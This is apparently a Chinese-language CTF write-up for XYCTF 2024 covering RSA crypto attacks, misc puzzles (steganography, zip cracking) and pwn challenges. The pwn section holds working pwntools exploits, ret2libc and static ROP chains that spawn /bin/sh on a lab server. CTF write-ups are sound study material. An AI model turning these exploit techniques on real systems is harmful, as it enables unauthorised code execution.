# 26278624299187148406559772770865336226934633734285979741424867540828670397865189685966828527168795621543490979182417570078991930822041468539855006585233692884235331084907340302530060261742100702658312435180527335101284800616106884692498603300926488358017928867672861988448488439356448543527810620591324774111321619391264173779312033252573140028630441135269056099074531502841259940379636699304810677716177080486265721322966814104627525953974143476452058638927511594884002185219080847495835727300670028011001853179659250270200020884333850083063514830095064730932997593930711871108436386821290545084229347398808220810263

PYTHON

与反方向的密码相思不同是，这里的sha256换成了sha512,放在了flag中间，采用二元coppersmith

exp：

c=3335299537518434350008670067273514020883265809787658909900831303201069228111667477512288715627313377374377192065531931991830331266940281529429758933125645068623703704431432931062515459304407129764836169638068667723468109909932687335727824459807903558617156661138991973933280805156893120951135488168923425258119689993859896540097318197048436676318334502053269738046279338047497258783747007084564814994803144049365117574904704816542523015746396519693505167963245600047742456478545640334467678554748227823020862550712083249012329745708139070338928730226897923885785783461594034339595106377701306570280371612953393097739
n=26278624299187148406559772770865336226934633734285979741424867540828670397865189685966828527168795621543490979182417570078991930822041468539855006585233692884235331084907340302530060261742100702658312435180527335101284800616106884692498603300926488358017928867672861988448488439356448543527810620591324774111321619391264173779312033252573140028630441135269056099074531502841259940379636699304810677716177080486265721322966814104627525953974143476452058638927511594884002185219080847495835727300670028011001853179659250270200020884333850083063514830095064730932997593930711871108436386821290545084229347398808220810263

e = 2
import itertools

def small_roots(f, bounds, m=1, d=None):
    if not d:
        d = f.degree()
    R = f.base_ring()
    N = R.cardinality()
    f /= f.coefficients().pop(0)
    f = f.change_ring(ZZ)
    G = Sequence([], f.parent())
    for i in range(m+1):
        base = N^(m-i) * f^i
        for shifts in itertools.product(range(d), repeat=f.nvariables()):
            g = base * prod(map(power, f.variables(), shifts))
            G.append(g)
    B, monomials = G.coefficient_matrix()
    monomials = vector(monomials)
    factors = [monomial(*bounds) for monomial in monomials]
    for i, factor in enumerate(factors):
        B.rescale_col(i, factor)
    B = B.dense_matrix().LLL()
    B = B.change_ring(QQ)
    for i, factor in enumerate(factors):
        B.rescale_col(i, 1/factor)
    H = Sequence([], f.parent().change_ring(QQ))
    for h in filter(None, B*monomials):
        H.append(h)
        I = H.ideal()
        if I.dimension() == -1:
            H.pop()
        elif I.dimension() == 0:
            roots = []
            for root in I.variety(ring=ZZ):
                root = tuple(R(root[var]) for var in f.variables())
                roots.append(root)
            return roots
    return []

from Crypto.Util.number import *
import hashlib
from gmpy2 import *
m0=bytes_to_long(b'XYCTF{')
m3=bytes_to_long(b'}')
def hash(x):
    return hashlib.sha512(x.encode()).digest() * 2

num=1024
for i in range(80,20,-1):
    R.<x,y> = PolynomialRing(Zmod(n))
    m2=bytes_to_long(hash(str(i)))
    N=(((m0*2^(8*(i//2-6))+x)*2^num+m2)*2^(8*(i-i//2))+y*2^8+m3)^e-c
    m1=small_roots(N, (2^(8*(i//2-6)), 2^(8*(i-i//2-1))), m=4,d=4)
    #m=N.small_roots(x=2^(8*(i//2-6)),y=2^(8*(i-i//2)), beta=1, epsilon=0.05)
    print(i,end=' ')
    if m1:
        print()
        print(m1)
        x,y=m1[0]
        print(b'XYCTF{'+long_to_bytes(x)+long_to_bytes(y)+b'}')
#len(flag)=72
#b'XYCTF{jun_mai_quan_xia_ni_xiao_gu___wo_ji_ren_jian_xue_man_tou____114514}'    
APACHE

MISC

签到

扫描二维码关注公众号，发送“XYCTF2024，启动启动启动！！！”获取flag

game

百度识图

查看第一张相似图片，游戏名为Papers Please，故flag:XYCTF{Papers Please}

熊博士

压缩包得到一张图片和密文，猜测可能是维吉尼亚或者凯斯密码，随波逐流一键解码

得到flag:XYCTF{liu_ye_mei_you_xiao_jj}

ez_隐写

修改hint.png宽高得到hint，猜测压缩包密码是20240401，得到WATERMARK.jpg，图片水印得到

ZIP神之套

压缩包打开得到一个exe文件和带密码的压缩包，压缩包密码应该与exe文件有关，运行exe发现闪退，在其所在目录下运行。得到

image-20240406204046688

故考虑掩码攻击，这里我是之间猜的，应为未知位为8位，misc赛题里好几个地方都用到了比赛开始时间20240401，刚好也为8位，我猜是这个，

image-20240406205133185

刚好猜对了，掩码攻击也行，得到两个压缩包，发现套.zip里有flag.zip里的文件，刚好可以选择明文攻击

得到密钥，解压得到flag

XYCTF{1A4B8-C9D2F3E-6A4B8C-9D2F3E7F}
APACHE

zzl的护理小课堂

抓包改url向flag.php发送信息

TCPL

直接在Ubuntu运行，提示：riscv64-binfmt-P: Could not open ‘/lib/ld-linux-riscv64-lp64d.so.1’: No such file or directory

百度搜索，找到文章，执行代码

sudo apt install libc6-riscv64-cross
sudo apt install binutils-riscv64-linux-gnu
sudo apt install gcc-riscv64-linux-gnu
sudo apt install binutils-riscv64-unknown-elf
sudo apt install gcc-riscv64-unknown-elf
sudo apt install qemu-system-misc
sudo apt install qemu-user

sudo cp /usr/riscv64-linux-gnu/lib/* /lib/

CMAKE

运行附件得到

将1换成0，即可得flag

九转修仙转（未完成）

压缩包最外层密码：XYCTF20240401

炼气:天书解密

爆破图片宽高得到

筑基

随波逐流一键解密，BubbleBabble编码

LSB隐写得到

base64解码

0f_crypt0_and_
TEXT

结丹

摩斯密码（四个交点为”-”，三个交点为空格，一个交点为”.”）

- .... . ..--.- - .... .. .-. -..
JBOSS-CLI

打开flag.zip提示有额外数据，010查看

解码得到

第四层：元婴

第5层：化神

md5爆破得到压缩包密码：key{liuyyds}

炼虚

合体

第8层：大乘 p^q 剪枝算法

n= 22424440693845876425615937206198156323192795003070970628372481545586519202571910046980039629473774728476050491743579624370862986329470409383215065075468386728605063051384392059021805296376762048386684738577913496611584935475550170449080780985441748228151762285167935803792462411864086270975057853459586240221348062704390114311522517740143545536818552136953678289681001385078524272694492488102171313792451138757064749512439313085491407348218882642272660890999334401392575446781843989380319126813905093532399127420355004498205266928383926087604741654126388033455359539622294050073378816939934733818043482668348065680837
c= 1400352566791488780854702404852039753325619504473339742914805493533574607301173055448281490457563376553281260278100479121782031070315232001332230779334468566201536035181472803067591454149095220119515161298278124497692743905005479573688449824603383089039072209462765482969641079166139699160100136497464058040846052349544891194379290091798130028083276644655547583102199460785652743545251337786190066747533476942276409135056971294148569617631848420232571946187374514662386697268226357583074917784091311138900598559834589862248068547368710833454912188762107418000225680256109921244000920682515199518256094121217521229357
gift= 14488395911544314494659792279988617621083872597458677678553917360723653686158125387612368501147137292689124338045780574752580504090309537035378931155582239359121394194060934595413606438219407712650089234943575201545638736710994468670843068909623985863559465903999731253771522724352015712347585155359405585892
from Crypto.Util.number import*
from gmpy2 import*
import math


def check_cong(k, p, q, n, xored=None):
    kmask = (1 << k) - 1
    p &= kmask
    q &= kmask
    n &= kmask
    pqm = (p*q) & kmask
    return pqm == n and (xored is None or (p^q) == (xored & kmask))

def extend(k, a):
    kbit = 1 << (k-1)
    assert a < kbit
    yield a
    yield a | kbit

def factor(n, p_xor_q):
    tracked = set([(p, q) for p in [0, 1] for q in [0, 1]
                   if check_cong(1, p, q, n, p_xor_q)])

    PRIME_BITS = int(math.ceil(math.log(n, 2)/2))

    maxtracked = len(tracked)
    for k in range(2, PRIME_BITS+1):
        newset = set()
        for tp, tq in tracked:
            for newp_ in extend(k, tp):
                for newq_ in extend(k, tq):
                    # Remove symmetry
                    newp, newq = sorted([newp_, newq_])
                    if check_cong(k, newp, newq, n, p_xor_q):
                        newset.add((newp, newq))

        tracked = newset
        if len(tracked) > maxtracked:
            maxtracked = len(tracked)
    print('Tracked set size: {} (max={})'.format(len(tracked), maxtracked))

    # go through the tracked set and pick the correct (p, q)
    for p, q in tracked:
        if p != 1 and p*q == n:
            return p, q

    assert False, 'factors were not in tracked set. Is your p^q correct?'

p, q = factor(n, gift)
print(p)
print(q)
'''
p=145805499551351837545170670839798336872366414383311042018386386595288060139791135454980413014693924866953972662266748526407954492877610429602886244372924035960962307198910659475639333945895922717307291255423855616274924584270570126180050363106535962473049107576556315461013755859097114552522187755171423621071
q=153796947048270429510444756458855481287460639468563001213489907625132438953570738468181770925091867439727519074685449940618659583114338501872698220745473531199063071421852521618805765627999106188015431567625318850899895052130157037822960945909520973243793507740817436707504505709194025074527084803054107605547
'''
e = 65537
phi = (p - 1) * (q - 1)
d = invert(e, phi)
m = pow(c, d, n)
print(long_to_bytes(m))
#password{pruning_algorithm}
1C

第9层：渡劫

hint9.py

exp

n = 107803636687595025440095910573280948384697923215825513033516157995095253288310988256293799364485832711216571624134612864784507225218094554935994320702026646158448403364145094359869184307003058983513345331145072159626461394056174457238947423145341933245269070758238088257304595154590196901297344034819899810707
c = 46049806990305232971805282370284531486321903483742293808967054648259532257631501152897799977808185874856877556594402112019213760718833619399554484154753952558768344177069029855164888168964855258336393700323750075374097545884636097653040887100646089615759824303775925046536172147174890161732423364823557122495
list = [618066045261118017236724048165995810304806699407382457834629201971935031874166645665428046346008581253113148818423751222038794950891638828062215121477677796219952174556774639587782398862778383552199558783726207179240239699423569318, 837886528803727830369459274997823880355524566513794765789322773791217165398250857696201246137309238047085760918029291423500746473773732826702098327609006678602561582473375349618889789179195207461163372699768855398243724052333950197]


from Crypto.Util.number import *
from gmpy2 import *

for a1 in range(256):
    for a2 in range(256):
        p=gcd(list[0]*a1-list[1]*a2,n)
        if n%p==0 and p!=1 and p!=n:
            print(list[0] * a1 - list[1] * a2 % n)
            print('p=',p)


p=12951283811821084332224320465045864899191924765916891677355364529850728204537369439910942929239876470054661306841056350863576815710640615409980095344446711

q=n//p
print(q,n==p*q)
e=65537
print(gcd(e,(p-1)))
d=invert(e,(p-1))
print(d)

m=powmod(c%p,d,p)
print(m)
print(long_to_bytes(m))
#b'game_over'
ROUTEROS

pwn

hello_world(签到)

exp

from pwn import *
context(arch='amd64',os='linux',log_level='debug')
p = remote('192.168.182.1',13830)

elf = ELF("./vuln")
libc = ELF("./libc.so.6")

payload=b'a'*0x28
p.send(payload)
base=u64(p.recvuntil("\x7f")[-6:].ljust(8,b"\x00"))-0x29d90
pop_rdi=0x2a3e5+base
system=base+libc.sym['system']
binsh=base+0x1d8678
ret=base+0x2db7d
payload=b'a'*0x28+p64(ret)+p64(pop_rdi)+p64(binsh)+p64(system)

p.sendlineafter(b'please input your name:',payload)
p.interactive()
XYCTF{a954b733-9403-42ee-b59f-ff006a2eac03}
ROUTEROS

static_link

exp

from pwn import *
context(arch='amd64',os='linux',log_level='debug')
p = remote('192.168.182.1',14286)


pop_rdi = 0x401f1f

pop_rsi = 0x409f8e 
pop_rdx = 0x451322 
pop_rax = 0x447fe7 
ret_addr = 0x40101a 
syscall_addr = 0x447590 
binsh_addr = 0x4C5240 
read_addr = 0x447580

payload1 = b'a'* 0x28 + p64(pop_rdi) + p64(0) +p64(pop_rsi) + p64(binsh_addr) + p64(pop_rdx) + p64(256) + p64(read_addr) + p64(pop_rax)+ p64(59) + p64(pop_rdi) + p64(binsh_addr )+p64(pop_rsi) + p64(0) + p64(pop_rdx) + p64(0) + p64(syscall_addr)

p.send(payload1) 

sleep(1)
p.send('/bin/sh')

p.interactive() 
ERLANG

guestbook1

exp

from pwn import *
context(arch='amd64',os='linux',log_level='debug')


p = remote('192.168.182.1',12571)
p.sendlineafter(b"index\n",b'32')
p.sendlineafter(b"name:\n", b'111')
p.sendlineafter(b"id:\n", b'0')
ret_addr=0x40101A
backdoor=0x40133A
ls=[58,19,64,0,0,0,0,0]
for i in range(0,32):
	p.sendlineafter(b"index\n", b'%d'%i)
	p.sendafter(b"name:\n", p64(backdoor)*2)
	p.sendlineafter(b"id:\n", b'%d'%ls[i%8])
p.sendlineafter(b"index\n", b'-1')
p.interactive()


APACHE